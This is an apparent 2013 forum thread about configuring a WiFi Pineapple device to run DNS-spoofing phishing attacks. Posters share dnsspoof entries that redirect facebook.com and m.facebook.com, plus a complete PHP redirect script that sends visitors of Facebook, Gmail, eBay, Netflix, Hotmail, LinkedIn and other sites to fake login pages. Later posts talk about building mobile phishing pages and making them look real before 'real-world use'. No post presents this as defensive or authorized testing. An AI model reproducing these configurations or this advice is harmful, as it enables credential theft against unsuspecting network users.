TylerCPU Posted February 11, 2013 Share Posted February 11, 2013 (edited) Tyler, that is simply not true. 2.7.7 is the most stable we have it seems. It will move to 2.8.0 very soon. The permission issue is on the usb and NOT on the pineapple ;) Thanks for the input. What I mean by "unstable" is problems with configuration. In the 2.7.5 firmware it had a redirect.php problem and USB 3G connections problem which was fixed in the 2.7.6 firmware. Which was never a problem for me at least in the 2.7.0 firmware. I can't vouch USB 3G, but that's what I mean by, "unstable". I never said that the permissions problem was the pineapple or the usbs fault. I just stated that it looked like a permissions problem and that I saw it was fixed by chmod. You can't deny that there are problems with beta versions. You can see that in the change logs with 2.7.1,2,3,4,5,6,7. I just like to stay with the Latest Stable Version. Anyways I'm so glad you guys are working hard to smash these bugs. Keep up the good work! ^_^ Edited February 11, 2013 by TylerCPU Link to comment Share on other sites More sharing options...
Sebkinne Posted February 11, 2013 Share Posted February 11, 2013 Thanks for the input. What I mean by "unstable" is problems with configuration. In the 2.7.5 firmware it had a redirect.php problem and USB 3G connections problem which was fixed in the 2.7.6 firmware. Which was never a problem for me at least in the 2.7.0 firmware. I can't vouch USB 3G, but that's what I mean by, "unstable". I never said that the permissions problem was the pineapple or the usbs fault. I just stated that it looked like a permissions problem and that I saw it was fixed by chmod. You can't deny that there are problems with beta versions. You can see that in the change logs with 2.7.1,2,3,4,5,6,7. I just like to stay with the Latest Stable Version. Anyways I'm so glad you guys are working hard to smash these bugs. Keep up the good work! ^_^ Well, I never said that there haven't been issues. What I was saying though is that the permissions issue is not related to the firmware.. Anyway, seems like the issue is sorted. Link to comment Share on other sites More sharing options...
TylerCPU Posted February 11, 2013 Share Posted February 11, 2013 (edited) Well, I never said that there haven't been issues. What I was saying though is that the permissions issue is not related to the firmware.. Anyway, seems like the issue is sorted. Well that's good. Whenever I run into problems like this I usually reflash and start over again. That fixes the problem. Sometimes not. Anyways I glad the issue is sorted out too. :D Edited February 11, 2013 by TylerCPU Link to comment Share on other sites More sharing options...
Zephyr Posted February 12, 2013 Share Posted February 12, 2013 Sebkinne: The problem was the former, as you said. While created the dual swap/storage partion usb in Ubuntu, I had to take ownership of the storage partion in order to move the phishing files onto it, when I clearly should have released ownership and transfered the files later in WinSCP. Tyler: I too usually do not use beta releases until they have been proven, but Sebkinne seemed to be pretty sure of it so I took a leap of faith, knowing I could revert later if necessary. As far as I can tell, there is in fact a problem with redirect.php on 2.7.7; Assuming your DNS spoof config is set to only 172.16.42.1 *, all traffic of course gets redireced through redirect.php for parsing. Under this configuration, for all the spoof pages it works fine and they all load. However if you try to visit a legit page, redirect.php will not pass it through, but rather the browser gets stuck on a blank redirect.php page. The work around for this was to put all URLs for the spoof pages in the DNS spoof config and update, such as the ones included in your txt file. This seems to be a better approach to me as, like you said, it doesn't make much sense to have redirect.php needlessly handling a lot of traffic that it doesn't need to. Speaking of spoof pages, I added a '172.16.42.1 m.facebook.com' to the DNS spoof config, which of course leads to the full-version facebook spoof page, which could be a bit glaring even to most brain-dead users out there, which leads me to a question. Many if not most connections today are mobile devices (i.e. smart phones) connecting to mobile versions of websites. In your next release, do you think you could add the mobile versions of popular websites as well? That would cover the gamut very well. Link to comment Share on other sites More sharing options...
TylerCPU Posted February 12, 2013 Share Posted February 12, 2013 (edited) Sebkinne: The problem was the former, as you said. While created the dual swap/storage partion usb in Ubuntu, I had to take ownership of the storage partion in order to move the phishing files onto it, when I clearly should have released ownership and transfered the files later in WinSCP. Tyler: I too usually do not use beta releases until they have been proven, but Sebkinne seemed to be pretty sure of it so I took a leap of faith, knowing I could revert later if necessary. As far as I can tell, there is in fact a problem with redirect.php on 2.7.7; Assuming your DNS spoof config is set to only 172.16.42.1 *, all traffic of course gets redireced through redirect.php for parsing. Under this configuration, for all the spoof pages it works fine and they all load. However if you try to visit a legit page, redirect.php will not pass it through, but rather the browser gets stuck on a blank redirect.php page. The work around for this was to put all URLs for the spoof pages in the DNS spoof config and update, such as the ones included in your txt file. This seems to be a better approach to me as, like you said, it doesn't make much sense to have redirect.php needlessly handling a lot of traffic that it doesn't need to. Speaking of spoof pages, I added a '172.16.42.1 m.facebook.com' to the DNS spoof config, which of course leads to the full-version facebook spoof page, which could be a bit glaring even to most brain-dead users out there, which leads me to a question. Many if not most connections today are mobile devices (i.e. smart phones) connecting to mobile versions of websites. In your next release, do you think you could add the mobile versions of popular websites as well? That would cover the gamut very well. I asked @Sebkinne why you have to add the 'header('Status: 302 Found');' for the phishing to work. He said,"For some reason we are having issues with the header that is being sent back. The location header gets sent but the status header gets sent as 200 instead of 302.That means that your browser sees that it has a location to redirect to but it wont unless the status is 302." I think I will start working on the phishing pages for mobile browsers. You can check out the mobile facebook website redacted and more to come. To make this work add this to the redirect.php file. if (strpos($ref, "facebook")){ header('Status: 302 Found'); header('Location: facebook.htm'); } if (strpos($ref, "m.facebook")){ header('Status: 302 Found'); header('Location: facebookmobile.htm'); } and this to the dnsspoof file 172.16.42.1 facebook.com 172.16.42.1 *.facebook.com Go to m.facebook.com and have fun. Edited February 18, 2013 by Sebkinne Link to comment Share on other sites More sharing options...
Zephyr Posted February 12, 2013 Share Posted February 12, 2013 Beautiful ... works perfectly. Great work, Tyler. Link to comment Share on other sites More sharing options...
CrackAlot Posted February 14, 2013 Share Posted February 14, 2013 Ok, so here is the problem I had and the solution. problem: I downloaded someones pages and added them to my redirect script. My pages still worked fine, but the new ones would just refresh constantly without ever loading content. I thought for sure my redirect.php was messed up some how. solution: So me being in a hurry, I typed in .html after every line not looking at the .htm extension on these new files and spent hours trying to figure out what was going on. I then, just had a brain fart and noticed what I had been missing for days. Moral of the story, don't expect everyone to name there html files .html. Here is my working redirect.php <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "example")){ header('Status: 302 Found'); header('Location: example.html'); } if (strpos($ref, "facebook")) { header('Status: 302 Found'); header('Location: facebook.html'); } if (strpos($ref, "ebay")) { header('Status: 302 Found'); header('Location: ebay.html'); } if (strpos($ref, "twitter")) { header('Status: 302 Found'); header('Location: twitter.html'); } if (strpos($ref, "dropbox")) { header('Status: 302 Found'); header('Location: dropbox.htm'); } if (strpos($ref, "netflix")) { header('Status: 302 Found'); header('Location: netflix.htm'); } if (strpos($ref, "ustream")) { header('Status: 302 Found'); header('Location: ustream.htm'); } if (strpos($ref, "vimeo")) { header('Status: 302 Found'); header('Location: vimeo.htm'); } if (strpos($ref, "youtube")) { header('Status: 302 Found'); header('Location: youtube.htm'); } if (strpos($ref, "gmail")) { header('Status: 302 Found'); header('Location: gmail.htm'); } if (strpos($ref, "blogger")) { header('Status: 302 Found'); header('Location: blogger.htm'); } if (strpos($ref, "googleplus")) { header('Status: 302 Found'); header('Location: googleplus.htm'); } if (strpos($ref, "hotmail")) { header('Status: 302 Found'); header('Location: hotmail.htm'); } if (strpos($ref, "linkedin")) { header('Status: 302 Found'); header('Location: linkedin.htm'); } if (strpos($ref, "outlook")) { header('Status: 302 Found'); header('Location: outlook.htm'); } if (strpos($ref, "boingo")) { header('Status: 302 Found'); header('Location: boingo.html'); } require('boingo.html'); ?> Link to comment Share on other sites More sharing options...
Boba Fett Posted February 15, 2013 Share Posted February 15, 2013 Can anyone show how create the phishing page, to update de templates? Thanks! Link to comment Share on other sites More sharing options...
Zephyr Posted February 15, 2013 Share Posted February 15, 2013 There are many tutorials floating about. http://forums.hak5.org/index.php?/topic/28278-rq-hotmailcom-outlookcom-phishing-pages-or-guide-to-how-to-make/ The basic process is the same for all phishing pages. I'm still working with it and learning myself. The #1 rule, before you real-world use a phishing page you create, test it and test it again, on multiple machines and devices. Compare it with the real thing until you know it's perfect. Above all your phish page must look real. Link to comment Share on other sites More sharing options...
Recommended Posts